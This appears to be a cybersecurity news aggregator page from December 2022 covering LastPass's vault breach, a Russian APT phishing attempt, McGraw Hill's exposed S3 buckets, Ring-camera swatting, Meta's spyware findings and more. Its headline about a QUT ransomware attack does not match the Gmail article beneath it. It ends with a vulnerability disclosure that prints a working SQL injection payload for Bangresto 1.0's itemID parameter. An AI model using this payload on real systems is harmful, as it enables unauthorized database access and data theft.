IT infrastructure at Queensland University of Technology shut down following a Ransomware attack

-

24 December 2022

As part of its attempts to safeguard emails sent via the online version of the platform, Google on Friday revealed that client-side encryption for Gmail is in beta for Workspace and school clients.

The adjustment is a positive one for users who appreciate the security of their personal data because it comes at a time when worries about internet privacy and data security are at an all-time high.

In order to participate in the beta programme, customers of Google Workspace Enterprise Plus, Education Plus, and Education Standard may apply until January 20, 2023. Personal Google Accounts cannot access it.

“Using client-side encryption in Gmail ensures sensitive data in the email body and attachments are indecipherable to Google servers,” the company said in a post. “Customers retain control over encryption keys and the identity service to access those keys.”

It is important to know that the latest safeguards offered by Gmail is different from end-to-end encryption.

Client-side encryption, as the name implies, is a way to protect data at rest. It allows organizations to encrypt data on Google services with their own cryptographic keys. The data is decrypted on the client-side using keys that are generated and managed by a key management service, which is hosted in the cloud.

Google’s opt-in feature requires administrators to set up an encryption key service through one of the company’s partners — which are offered by Flowcrypt, Fortanix, Futurex, Stormshield, Thales, or Virtru — or alternatively, build their own service using its client-side encryption API.

This means the data is protected from unauthorized access, even from the server or the service provider. However, the organization or administrator has control over the keys and can monitor users’ encrypted files or revoke a user’s access to the keys, even if they were generated by the user themselves.

On the other hand, end-to-end encryption (E2EE) is a method of communication in which information is encrypted on the sender’s device and can be decrypted only on the recipient’s device with a key known only to the sender and the recipient.

With that said, the new option – limited to the web browser for now – permits users to send and receive encrypted emails both within and outside of their domains. The encryption covers email body and attachments, including inline images, but not the subject and recipient lists.

Gmail is not the only Google product with client-side encryption turned on. The tech giant enabled the same functionality for Google Drive last year and Google Meet earlier this August. A similar test for Google Calendar ended on November 11, 2022.

It’s worth noting that Google Drive apps for desktop as well as Android and iOS support client-side encryption. Google said that the feature will be integrated into mobile apps for Meet and Calendar in an upcoming release.

“Client-side encryption helps strengthen the confidentiality of your data while helping to address a broad range of data sovereignty and compliance needs,” the company further added.

Check out our new Discord Cyber Awareness Server. Stay informed with CVE Alerts, Cybersecurity News & More!

Remember, CyberSecurity Starts With You!

Globally, 30,000 websites are hacked daily.
64% of companies worldwide have experienced at least one form of a cyber attack.
There were 20M breached records in March 2021.
In 2020, ransomware cases grew by 150%.
Email is responsible for around 94% of all malware.
Every 39 seconds, there is a new attack somewhere on the web.
An average of around 24,000 malicious mobile apps are blocked daily on the internet.

Please login to bookmark

LastPass finally admits attackers have a copy of customers’ password vaults

By

-

23 December 2022

Customers of password manager LastPass have been informed that during the attack on its servers in August 2022, unidentified persons copied encrypted files containing the passwords to their accounts.

The August 2022 attack saw “some source code and technical information being stolen from our development environment and used to target another employee, obtaining credentials and keys which were used to access and decrypt some storage volumes within the cloud-based storage service,” according to a December 22 update to the incident’s advice from LastPass.

The attacker was able to copy data “that contained basic customer account information and related metadata, including company names, end-user names, billing addresses, email addresses, telephone numbers, and the IP addresses from which customers were accessing the LastPass service” thanks to the use of hose credentials.

According to the update, the hacker also copied information from the “customer vault” file, which LastPass users to store their passwords.

This file “is saved in a proprietary binary format and contains both fully-encrypted sensitive fields, such as website usernames and passwords, secure notes, and form-filled data, as well as unencrypted data, such as website URLs.”

It implies that the attackers have access to user passwords. Thank goodness, though, that these passwords are encrypted with “256-bit AES encryption and can only be decrypted with a unique encryption key created from each user’s master password.”

Customers who utilise LastPass’ default settings are advised that even though attackers have access to that file, they are unaffected by this upgrade because “it would take millions of years to guess your master password using generally available password-cracking technologies.”

Not reusing the master password needed to access LastPass is one of the default options. The company advises that you create a complicated password and only use it to access LastPass.

However, users frequently display mind-bogglingly careless password selection, with two thirds of users reusing passwords despite the fact that they should know better.

Oh, and don’t forget that the LastPass client vault has plenty of other secure spaces for storing private data.

Therefore, LastPass provided the following guidance to both individual users and business users:

If your master password does not make use of the defaults above, then it would significantly reduce the number of attempts needed to guess it correctly. In this case, as an extra security measure, you should consider minimizing risk by changing passwords of websites you have stored.

Dear reader, enjoy changing all those passwords.

The update from LastPass ends with the announcement that the compromised systems have been decommissioned and new infrastructure with increased security has been constructed.

Check out our new Discord Cyber Awareness Server. Stay informed with CVE Alerts, Cybersecurity News & More!

Remember, CyberSecurity Starts With You!

Globally, 30,000 websites are hacked daily.
64% of companies worldwide have experienced at least one form of a cyber attack.
There were 20M breached records in March 2021.
In 2020, ransomware cases grew by 150%.
Email is responsible for around 94% of all malware.
Every 39 seconds, there is a new attack somewhere on the web.
An average of around 24,000 malicious mobile apps are blocked daily on the internet.

Please login to bookmark

Russian-Backed Hackers attacked a “major” oil refinery in a NATO Country

By

-

22 December 2022

A significant petroleum refining corporation with headquarters in a NATO nation was recently the focus of an attempt by one of the Kremlin’s most active hacking groups targeting Ukraine. Given that Russia’s invasion of its neighbouring country is still going strong, the attack indicates that the gang is increasing its intelligence collecting.

On August 30, a hacking effort was made, however it was unsuccessful, according to experts at Palo Alto Networks’ Unit 42. The Ukrainian Security Service has linked the hacker collective to the Federal Security Service of Russia. The gang has been traced under a number of aliases, including Trident Ursa, Gamaredon, UAC-0010, Primitive Bear, and Shuckworm.

Unit 42 has mapped more than 500 new domains, 200 samples, and other breadcrumbs in the last 10 months. In spear phishing efforts meant to infect targets with data-stealing software, Trident Ursa has made its mark. The majority of the group’s communications contain lures in Ukrainian. However, more recent samples indicate that the group has started utilising English-language lures as well.

Researchers from the company concluded that the samples “suggest that Trident Ursa is trying to increase their intelligence collection and network access against Ukrainian and NATO allies.”

Among the filenames used in the unsuccessful attack were: MilitaryassistanceofUkraine.htm, Necessary_military_assistance.rar, and List of necessary things for the provision of military humanitarian assistance to Ukraine.lnk.

The targeted petroleum business and the nation where the facility was situated were not mentioned in Tuesday’s article. Western-aligned officials have recently warned that the Kremlin has its sights set on energy corporations in nations that are opposed to Russia’s conflict in Ukraine.

According to CyberScoop, National Security Agency Cyber Director Rob Joyce expressed alarm about large assaults from Russia, particularly those aimed at the international energy industry, last week.

“I would not encourage anyone to be complacent or be unconcerned about the threats to the energy sector globally,” Joyce said, according to CyberScoop. “As the [Ukraine] war progresses there’s certainly the opportunities for increasing pressure on Russia at the tactical level, which is going to cause them to reevaluate, try different strategies to extricate themselves.”

The NSA’s annual year in review noted Russian has unleashed at least seven distinct pieces of wiper malware designed to permanently destroy data. One of those Wipers took out thousands of satellite modems used by customers of communications company Viasat. Among the damaged modems were tens of thousands of terminals outside of Ukraine that support wind turbines and provide Internet services to private citizens.

Ten days ago, Norway’s prime minister Jonas Gahr Støre warned that Russia posed a “real and serious threat… to the oil and gas industry” of Western Europe as the country attempts to break the will of Ukrainian allies.

Trident Ursa’s hacking techniques are simple but effective. The group uses multiple ways to conceal the IP addresses and other signatures of its infrastructure, phishing documents with low detection rates among anti-phishing services, and malicious HTML and Word documents.

Unit 42 researchers wrote:

Trident Ursa remains an agile and adaptive APT that does not use overly sophisticated or complex techniques in its operations. In most cases, they rely on publicly available tools and scripts—along with a significant amount of obfuscation—as well as routine phishing attempts to successfully execute their operations.

This group’s operations are regularly caught by researchers and government organizations, and yet they don’t seem to care. They simply add additional obfuscation, new domains and new techniques and try again—often even reusing previous samples.

Continuously operating in this way since at least 2014 with no sign of slowing down throughout this period of conflict, Trident Ursa continues to be successful. For all of these reasons, they remain a significant threat to Ukraine, one which Ukraine and its allies need to actively defend against.

Tuesday’s report provides a list of cryptographic hashes and other indicators organizations can use to determine if Trident Ursa has targeted them. It also provides suggestions for ways to protect organizations against the group.

Check out our new Discord Cyber Awareness Server. Stay informed with CVE Alerts, Cybersecurity News & More!

Remember, CyberSecurity Starts With You!

Globally, 30,000 websites are hacked daily.
64% of companies worldwide have experienced at least one form of a cyber attack.
There were 20M breached records in March 2021.
In 2020, ransomware cases grew by 150%.
Email is responsible for around 94% of all malware.
Every 39 seconds, there is a new attack somewhere on the web.
An average of around 24,000 malicious mobile apps are blocked daily on the internet.

Please login to bookmark

Apple is accused of censoring apps in Hong Kong and Russia

By

-

22 December 2022

According to two stories published on Thursday, Apple has been accused of sacrificing human rights for financial gain by obediently complying with censorship requests in China and Russia.

The Apple Censorship Project, which is sponsored by free speech advocacy group GreatFire, published the reports titled “Apps at Risk: Apple’s Censorship and Compromises in Hong Kong” and “United Apple: Apple’s Censorship and Compromises in Russia.”

According to Benjamin Ismail, campaign and advocacy director at GreatFire and project head of GreatFire’s Apple Censorship project, “as our two reports illustrate, evidence of Apple’s censorship abound.”

“Apple’s temporary withdrawal from Russia following the start of the war in Ukraine, and Apple’s decision to move part of its production out of China, have not provided tangible evidence of any improvement of the situation in the App Store so far. For all we know, Apple is still willing to collaborate with repressive regimes.”

Ismail said he expects the reports will be used to try to convince lawmakers to pass antitrust bills that aim to mitigate Apple’s App Store gatekeeping powers – something European lawmakers may have achieved with the recently approved Digital Markets Act.

The Hong Kong-focused Apps at Risk report contends that Apple’s 50 percent share of the smartphone market makes it the Chinese Communist Party’s de facto kill switch for politically challenging content.

It mentions that there were 2,370 unavailable apps in the Hong Kong App Store in November 2022. 10,837 apps are missing from the Chinese App Store, while 2,754 apps are absent from the Russian App Store.

According to the report, a lot of VPN apps have disappeared from the Hong Kong App Store. Many media and information apps have allegedly been banned globally over the past two years, raising the suspicion that Apple is either engaging in global self-censorship or is doing so on behalf of authorities.

The Apps at Risk report report says Apple has failed to offer support for the right of people in Hong Kong to access information without restriction and to express themselves online, even as the Chinese government has suppressed the democracy movement in Hong Kong.

“Apple’s known about Beijing’s authoritarian preferences for decades,” the report says. “Apple’s response to the events in Hong Kong the last few years are not knee-jerk reactions. Apple’s response is aligned to its global business strategies, with a top priority of appeasing the Chinese government to protect Apple’s supply chain, distribution channels, and revenue stream.”

The report demands that Apple officially reaffirm its support for the freedom of information and speech of Hong Kong residents.

The Russia investigation examines discrepancies between how Chinese and Russian censorship demands are carried out but comes to the same findings about Apple’s business practises. It claims that between 2018 and 2022, Apple appeared to accede to censorship requests from the Kremlin more quickly.

“If Apple’s compliance with requests for censorship is best illustrated by cases of app removals from the iOS App Store,” the report says. “Russia’s innovative and extensive oppression has also led to censorship within software (LGBTQ+ watch faces), accessories (LGBTQ+ watch bands), software-based cartography (Crimea), protocols (Private Relay), and even the design of iOS (Russian iOS).”

The Russia report, citing Apple’s removal of LGBTQ+ apps in furtherance of state-backed homophobia, calls out “the insincerity of Apple’s self-proclaimed support for LGBTQ+ Rights.”

Asked whether Apple’s deployment of end-to-end encryption in iCloud might change things, Ismail expressed skepticism.

“We know nothing about how the data are stored in China Guizhou data center, which is owned by a Chinese company and not by Apple,” he said in an email to The Register. “In this case, and for many other examples related to the management of the App Store (e.g. Government App Takedown Requests, App Store Review Board, etc.), Apple’s trademark is opacity.”

Ismail cautioned that the leverage authorities have in China and Russia over Apple will remain. “The relationships between those regimes and Apple are still asymmetrical, and strongly in favor of the governments of the country where Apple wants to maintain its access to the market, to build and to sell its products,” he said, pointing to Apple’s Private Relay, which never made it to China and was canceled in Russia.

Ismail however expressed optimism that Apple may be forced to allow third-party app stores. That requirement, called for under Europe’s Digital Markets Act, is also a part of the Open App Markets Act, a bill that GreatFire has endorsed and US lawmakers have yet to pass.

“If as a user, you are free to download and install apps from any store and the web, then the removal of apps by Apple at the behest of a repressive government will have less impact on the users,” Ismail explained. “Developers will still be able to update (and therefore secure) their apps and offer them to the users without control or intervention from Apple.”

“Moreover, it should be easier for Apple to dismiss censorship demands by saying that the users can still find the app targeted by the authorities, outside of the App Store. Eventually, it might dissuade the authorities to even make the demand to Apple.”

“Of course sideloading is not the perfect solution and other stores might be targeted by repressive governments. The important part is to let the users handle their device the way they want it to work. To have developers, publishers and customers all subject to Apple’s decision is very dangerous. It has been the case repeatedly over the last decade.”

Asked if Apple’s rivals have handled the situation any better, Ismail pointed to Google, which shut down its Chinese search engine in 2010 after it was hacked from within the country.

Google and Twitter, he said, do much better in terms of transparency, citing an Apple Censorship report from April “showing Apple is lying in its Transparency reports and deliberately conceals the scale of app’s unavailability and the reality of the 175 App Stores it operates worldwide.”

“It might be time for Apple to consider the possibility that it does more harm by being present in China than by not being there,” said Ismail. “In its Human Rights Policy, Apple claims ‘Our approach is based on the UN Guiding Principles on Business and Human Rights,’ yet every principle set in that UN document is the exact opposite of Apple’s policy.”

Apple did not respond to a request for comment.

Check out our new Discord Cyber Awareness Server. Stay informed with CVE Alerts, Cybersecurity News & More!

Remember, CyberSecurity Starts With You!

Globally, 30,000 websites are hacked daily.
64% of companies worldwide have experienced at least one form of a cyber attack.
There were 20M breached records in March 2021.
In 2020, ransomware cases grew by 150%.
Email is responsible for around 94% of all malware.
Every 39 seconds, there is a new attack somewhere on the web.
An average of around 24,000 malicious mobile apps are blocked daily on the internet.

Please login to bookmark

100,000 students’ grades and personal information were leaked via McGraw Hill’s S3 buckets

By

-

20 December 2022

According to security researchers, McGraw Hill’s misconfigured Amazon Web Services S3 buckets exposed more than 100,000 students’ records in addition to its own source code and cryptographic keys.

The research group at vpnMentor claimed to have found the open S3 buckets on June 12 and to have gotten in touch with McGraw Hill the following day. We’re informed that two buckets, one for production and the other for non-production, each held more than 69 million files and 10 TB of data.

“In the limited sample we researched, we could see that the amount of records varied on each file from ten to tens of thousands students per file,” the researchers said. “Due to the amount of files exposed and because we only review a small sample following ethical rules, the actual total number of affected students could be far higher than our estimate.”

Overall, the buckets contained more than 22 TB of data and over 117 million files. It included students’ names, email addresses, performance reports and grades as well as teachers’ syllabi and course reading materials for US and Canadian students and schools such as Johns Hopkins University, University of California-Los Angeles, University of Toronto and University of Michigan.

Additionally, the data dump leaked private digital keys, which could have allowed miscreants to decrypt the publisher’s sensitive data and access its servers, plus McGraw Hill’s source code.

The misconfigured S3 buckets could have been accessed by anyone with a web browser as far back as 2015, we’re told.

The researcher added that they used publicly accessible data to validate a “small sample” of the records and compared students’ social media profiles to the PII in McGraw Hill’s open buckets to prove the data belonged to actual people rather than just a platform test.

vpnMentor asserts that between June 13 and July 4, including reaching out to various departments and the chief information security officer, it contacted McGraw Hill nine times but never received a response after confirming that the data belonged to the company’s online learning platform.

Furthermore, the network security company claimed that between June 27 and July 4 it contacted the United States Computer Emergency Response Team (US-CERT) four times but received no response from them either.

Finally, according to the report, on September 21, McGraw Hill’s senior director of cybersecurity informed vpnMentor that the sensitive files had been taken down from the public pool on July 20.

“We are unable to determine if any malicious hackers found the unsecured buckets before McGraw Hill deleted the sensitive files,” the researchers wrote, adding that the exposed data could have been used for phishing campaigns and identity theft as well as doxxing and harassment.

Plus, we’d guess that the publishing firm’s source code and private keys would be appealing to ransomware gangs, who have a certain affinity for education-sector organizations and schools, or even less sophisticated criminals looking to make a buck or two on the darkweb.

“Furthermore, under US Federal law, student education records are official and confidential documents, by virtue of the Family Educational Rights and Privacy Act (FERPA),” the researchers noted. “A student’s grades may not be released or posted in any personally identifiable way without prior written permission from the student. As a result, by exposing these records, McGraw Hill may be in direct violation of FERPA, and could face enforcement actions from the relevant US government bodies.”

Not to name names, but a certain US watchdog agency (cough) Federal Trade Commission (cough) doesn’t take too kindly to leaks involving students’ data.

McGraw Hill did not respond to inquiries for this story.

Check out our new Discord Cyber Awareness Server. Stay informed with CVE Alerts, Cybersecurity News & More!

Remember, CyberSecurity Starts With You!

Globally, 30,000 websites are hacked daily.
64% of companies worldwide have experienced at least one form of a cyber attack.
There were 20M breached records in March 2021.
In 2020, ransomware cases grew by 150%.
Email is responsible for around 94% of all malware.
Every 39 seconds, there is a new attack somewhere on the web.
An average of around 24,000 malicious mobile apps are blocked daily on the internet.

Please login to bookmark

Swatters live-streamed attacks and mocked police using Ring cameras

By

-

20 December 2022

Two men are accused by federal prosecutors of participating in a campaign of swatting attacks against more than a dozen owners of compromised Ring home security cameras and using that access to broadcast the police reaction live on social media.

According to prosecutors in an indictment filed on Friday in the Central District of California, Kya Christian Nelson, 21, of Racine, Wisconsin, and James Thomas Andrew McCarty, 20, of Charlotte, North Carolina, compromised the Yahoo Mail accounts of each owner before gaining access to 12 Ring cameras. In a single week starting on November 7, 2020, prosecutors said, the men placed hoax emergency calls to the local police departments of each owner that were intended to draw an armed response, a crime known as swatting.

On November 8, for instance, local police in West Covina, California, received an emergency call purporting to come from a minor child reporting that her parents had been drinking and shooting guns inside the minor’s home. When police arrived at the residence, Nelson allegedly accessed the residence’s Ring doorbell and used it to verbally threaten and taunt the responding officers. The indictment alleges the men helped carry out 11 similar swatting incidents during the same week, occurring in Flat Rock, Michigan; Redding, California; Billings, Montana; Decatur, Georgia; Chesapeake, Virginia; Rosenberg, Texas; Oxnard, California; Darien, Illinois; Huntsville, Alabama; North Port, Florida; and Katy, Texas.

Prosecutors alleged that the two men and a third unnamed accomplice would first obtain the login credentials of Yahoo accounts and then determine if each account owner had a Ring account that could control a doorbell camera. The men would then use their access to gather the names and other information of the account holders. The defendants then placed the hoax emergency calls and waited for armed officers to respond.

“Defendants Nelson and McCarty would access without authorization the victims’ Ring devices and thereafter transmit the audio and video from those devices on social media during the police response,” prosecutors wrote. “Defendants Nelson and McCarty would verbally taunt responding police officers and victims through the Ring devices during the police response.”

It’s not clear how the defendants allegedly obtained the Yahoo account credentials.

A separate indictment filed in November in the District of Arizona alleged that McCarty participated in swatting attacks on at least 18 individuals.

Nelson, who used the moniker ChumLul, was already incarcerated in an unrelated case in Kentucky when the indictment was returned. McCarty, whose online handle was Aspertaine and who lived in Kayenta, Arizona, at the time of the alleged offenses, was arrested last week.

Both men are charged with one count of conspiracy to intentionally access computers without authorization. Nelson was also charged with two counts of intentionally accessing without authorization a computer and two counts of aggravated identity theft. If convicted, both men face a maximum penalty of five years in prison. Nelson faces an additional maximum penalty of at least seven years on the remaining charges.

Neither man has entered a plea yet.

The incident underscores the importance of securing email and home security accounts with long, randomly generated unique passwords. Whenever possible, people should use multi-factor authentication as well.

Check out our new Discord Cyber Awareness Server. Stay informed with CVE Alerts, Cybersecurity News & More!

Remember, CyberSecurity Starts With You!

Globally, 30,000 websites are hacked daily.
64% of companies worldwide have experienced at least one form of a cyber attack.
There were 20M breached records in March 2021.
In 2020, ransomware cases grew by 150%.
Email is responsible for around 94% of all malware.
Every 39 seconds, there is a new attack somewhere on the web.
An average of around 24,000 malicious mobile apps are blocked daily on the internet.

Please login to bookmark

Email hijackers con businesses out of food as well as money

By

-

20 December 2022

The FBI and other government agencies have warned that cybercriminals have begun using spoofed emails to steal shipments of real commodities, in this case, food. Business email compromise (BEC), which continues to be a multibillion-dollar danger, is evolving.

The FBI, along with the US Department of Agriculture and the Food and Drug Administration’s Office of Criminal Investigations, claimed that a number of US food manufacturers have already been the victims of frauds, many of which involved fake orders for a single product—powdered milk—worth hundreds of thousands of dollars.

BEC assaults are among the most financially damaging internet crimes, according to the FBI, which claims they brought in about $2.4 billion in revenue in 2021 alone. The process entails a criminal gaining access to a valid account and using it as is customary.

“In recent incidents, criminal actors have targeted physical goods rather than wire transfers using BEC tactics. Companies in all sectors—both buyers and suppliers—should consider taking steps to protect their brand and reputation,” the federal agencies said in their joint advisory.

It seems to have its roots in the 2008 Chinese infant formula incident, when milk powder tainted with melamine resulted in the deaths of six children and the hospitalisation of thousands more. Due to the fact that Chinese parents are apparently still apprehensive of domestically produced milk powder, imported brands are more expensive in China.

Smugglers of powdered milk have been thwarted in the past, such as the Australian ring that was busted in 2019 for thieving powdered milk and reselling it abroad. Black-market capitalism is evident in the progression from shoplifting to shipmentlifting, if for no other reason.

The FBI, FDA, and USDA noted in the joint alert that one victim was left liable for $160,000 worth of stolen milk powder after responding to one bogus request, while another had many orders totaling nearly $1 million.

The Learning Channel hacked, nearly 1TB of data stolen

Cyber extortion group Karakurt has added The Learning Channel (TLC) to its list of alleged victims, and says it’s ready to leak 931 GB of the company’s “scripts, videos, internal documentation,” and employee information if the company doesn’t pay up by December 23rd.

Karakurt, which is believed to be affiliated with ransomware group Conti, has been on the FBI, CISA and US Treasury Department’s radar since at least this past June, when the agencies issued a joint advisory warning of the threat posed by the group.

The Karakurt gang are believed to gain access by, among other things, buying compromised account credentials. The group has reportedly resorted to harassing and bullying the employees and business partners of its victims in an effort to extort them into paying.

According to the agencies, Karakurt is indiscriminate in its targeting, and has demanded payments of between $25,000 and $13 million to not leak stolen data. Karakurt isn’t known to deal in ransomware, and instead is a pure extortion operation.

TLC is a subsidiary of Discovery, which also operates HGTV, Cinemax and other television networks. Karakurt’s claims to have infiltrated the network are unverified and its ransom demands are unknown. It doesn’t appear Discovery has acknowledged the breach as of writing, and we’ve reached out to learn more.

Cloudflare offers free zero-trust to small critical infrastructure firms

Content delivery network Cloudflare is launching an initiative to protect small businesses operating in critical infrastructure sectors that will provide its zero trust platform free of charge – if they qualify.

Dubbed “Project Safekeeping,” Cloudflare said the initiative is necessary because the volume of attacks faced by companies in critical infrastructure sectors, like healthcare and energy, are overwhelming for even the largest firms.

“Smaller organizations typically do not have the capacity to manage relentless cyber attacks,” Cloudflare said.

The products Cloudflare is prepared to offer will be free and will have no time limit, the company said, and will include real-time app user verification, traffic filtering, cloud application security, data loss prevention, email security and remote browser isolation. DDoS protection and Cloudflare’s web app firewall are also included.

Unfortunately, the list of what it takes to qualify is pretty restrictive.

Only companies located in Australia, Japan, Germany, Portugal and the United Kingdom can apply, and applicants also have to operate in a sector their government has deemed “critical infrastructure.”

Those meeting that pair of criteria will have to face a final filter: A headcount of no more than 50 people and/or an annual revenue/balance sheet total less than $10 million US dollars. There’s no word on whether growth would result in loss of access, but it’s safe to assume Cloudflare would want successful customers to start paying it at some point.

Check out our new Discord Cyber Awareness Server. Stay informed with CVE Alerts, Cybersecurity News & More!

Remember, CyberSecurity Starts With You!

Globally, 30,000 websites are hacked daily.
64% of companies worldwide have experienced at least one form of a cyber attack.
There were 20M breached records in March 2021.
In 2020, ransomware cases grew by 150%.
Email is responsible for around 94% of all malware.
Every 39 seconds, there is a new attack somewhere on the web.
An average of around 24,000 malicious mobile apps are blocked daily on the internet.

Please login to bookmark

Meta issues a warning about the continued use of spyware targeting users of social media

By

-

17 December 2022

Facebook’s owner claims that businesses are adjusting and modifying their strategies in response to attempts to halt operations.

Because surveillance-for-hire businesses continue to adapt and shift strategies in the face of attempts to shut down their capabilities, Meta has cautioned that the use of spyware to indiscriminately target people – including journalists and activists – is a continuing threat.

According to a report by Facebook’s parent company, the social media group made an effort to ban a number of companies, including two with ties to Russia, one with roots in Israel, and one in China. According to Meta, these companies were all used to “scrape” Facebook and Instagram for users’ private information in an effort to compromise users’ accounts.

In one instance, Meta claimed to have deleted more than 100 Facebook and Instagram profiles connected to a Russian corporation named Avalanche, which it claimed sold access to a platform that permits online espionage. According to Meta, a wide range of people and organisations, including politicians, journalists, NGOs operating in the US, and environmental activists, were targeted by the Russian network. Other businesses that were eliminated from Meta platforms included the Israeli-based Cyberglobes and the New York-based Social Links, which had its roots in Russia.

At the same time, Meta acknowledged that other companies it sought to ban last year from its platforms after accusations that the groups’ software had been used to target thousands of users with malicious activity have tried to circumvent blocks on Meta’s platforms and updated their software to try to evade detection.

Nathaniel Gleicher, the head of security policy at Meta, said the company had sought to share information about threats with governments and other technology companies to mitigate the threat against users. But Gleicher also acknowledged that one big player in the social media industry – Twitter – no longer appeared to be available to accept information about such threats.

“Our key goal is to do everything we can to protect people. So we share our insights with our industry peers. Twitter is going through a transition right now and most of the people we’ve dealt with have moved on. As a result, we have to wait and see what they announce in these threat areas,” Gleicher told reporters on a call about the Meta report.

Forbes reported in November that Twitter’s security, privacy and compliance leaders all left the company less than two weeks after its acquisition by the billionaire Elon Musk.

Gleicher emphasised that no single company could tackle a “society-wide” challenge such as spyware. “They [spyware companies] are very ready to keep trying to come back, to re-establish their businesses,” Gleicher said.

Twitter was not available for comment.

Meta said some vendors of spyware used to target its users sometimes claim their software is intended to focus on criminals and terrorists, but Meta said its own threat research found that the software was used “regularly” to target “journalists, political opposition and human rights activists around the world”.

“These companies are part of a sprawling industry that provides intrusive software tools and surveillance services indiscriminately to any customer – regardless of who they target or the human rights abuses they might enable,” Meta said in its report. “In a sense, this industry ‘democratises’ these threats, making them available to government and non-government groups that otherwise wouldn’t have these capabilities to cause harm.”

In one case, Meta said it shut down a network of 900 fake Instagram and Facebook accounts operating from China, which appeared to focus on people in Myanmar, India, Taiwan, the US and China, including military personnel, pro-democracy activists, government employees, politicians and journalists.

Avalanche could not be reached for comment. Social Links and Cyberglobes did not immediately return requests for comment.

Check out our new Discord Cyber Awareness Server. Stay informed with CVE Alerts, Cybersecurity News & More!

Remember, CyberSecurity Starts With You!

Globally, 30,000 websites are hacked daily.
64% of companies worldwide have experienced at least one form of a cyber attack.
There were 20M breached records in March 2021.
In 2020, ransomware cases grew by 150%.
Email is responsible for around 94% of all malware.
Every 39 seconds, there is a new attack somewhere on the web.
An average of around 24,000 malicious mobile apps are blocked daily on the internet.

Please login to bookmark

Bangresta 1.0 SQL Injection

By

-

17 December 2022

An SQL injection Vulnerability was discovered in Bangresta 1.0 by Security Researcher @nu11secur1ty

## Title: Bangresto 1.0 SQLi
## Author: nu11secur1ty
## Date: 12.16.2022
## Vendor: https://axcora.com/, https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html
## Demo: https://axcora.my.id/bangrestoapp/start.php
## Software: https://github.com/mesinkasir/bangresto
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Bangresto

## Description:
The `itemID` parameter appears to be vulnerable to SQL injection attacks.
The payload ' was submitted in the itemID parameter, and a database
error message was returned.
The attacker can be stooling all information from the database of this
application.

## STATUS: CRITICAL Vulnerability

[+] Payload:

```MySQL
---
Parameter: itemID (GET)
    Type: error-based
    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
    Payload: itemID=(UPDATEXML(2539,CONCAT(0x2e,0x7171767871,(SELECT
(ELT(2539=2539,1))),0x7170706a71),2327))&menuID=1
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Bangresto)

## Proof and Exploit:
[href](https://streamable.com/moapnd)

## Time spent
`00:30:00`

Check out our new Discord Cyber Awareness Server. Stay informed with CVE Alerts, Cybersecurity News & More!

Remember, CyberSecurity Starts With You!

Globally, 30,000 websites are hacked daily.
64% of companies worldwide have experienced at least one form of a cyber attack.
There were 20M breached records in March 2021.
In 2020, ransomware cases grew by 150%.
Email is responsible for around 94% of all malware.
Every 39 seconds, there is a new attack somewhere on the web.
An average of around 24,000 malicious mobile apps are blocked daily on the internet.